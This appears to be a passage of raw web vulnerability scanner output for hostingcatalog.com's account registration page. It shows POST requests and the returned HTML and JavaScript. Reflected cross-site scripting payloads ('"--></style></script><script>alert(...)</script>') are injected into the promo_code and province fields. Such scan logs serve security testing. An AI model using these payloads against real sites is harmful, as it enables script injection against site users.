value='325A5101EE3560736CDAA374D48DB31EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073D6F93AB3339D3870C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE3560733A01BD7B24639A30C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073CD8DFA9623597202C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073A5922BDB8C629A7EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073B959F8C4BE61F76FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073A408DDF4AD0D56E66F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073B83449E6D59782176F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073BD50F147FD3C5E776F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
'"--></style></script><script>alert(0x001CF5)</script>
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF5)%3c%2fscript%3e&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE35607336E351B7C730F5B3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560730A02D7804F2143FD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE35607363BC15778A64EDC2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073C3227D66A868349DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE3560736FBB07600F0ACFDB6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE3560736BBB1B5B9A332E1CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073CF5DFCB4D6408D1CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073BD0F647A963E087C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE35607327D6D9F4FEC2E725C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE35607356BC97BBD50054EF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE35607379319E351BBDA92BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073E76F9D64ECDE5580C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE356073A3528CBD6B228C82C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073D314F21FD75C9A00C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560732317557903CBFCB6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073A10958FDC418F05FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073B557E03D0E69EE0B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073A2CB9B9C22CC2E7E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE3560735141AE2D86AA09356F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
'"--></style></script><script>alert(0x001CF6)</script>
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF6)%3c%2fscript%3e&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073CE74F460947B31D6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073FEC27D16BB4413076F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE3560731F4B14D3FF49CD55C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073AE90F0627E070188C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option 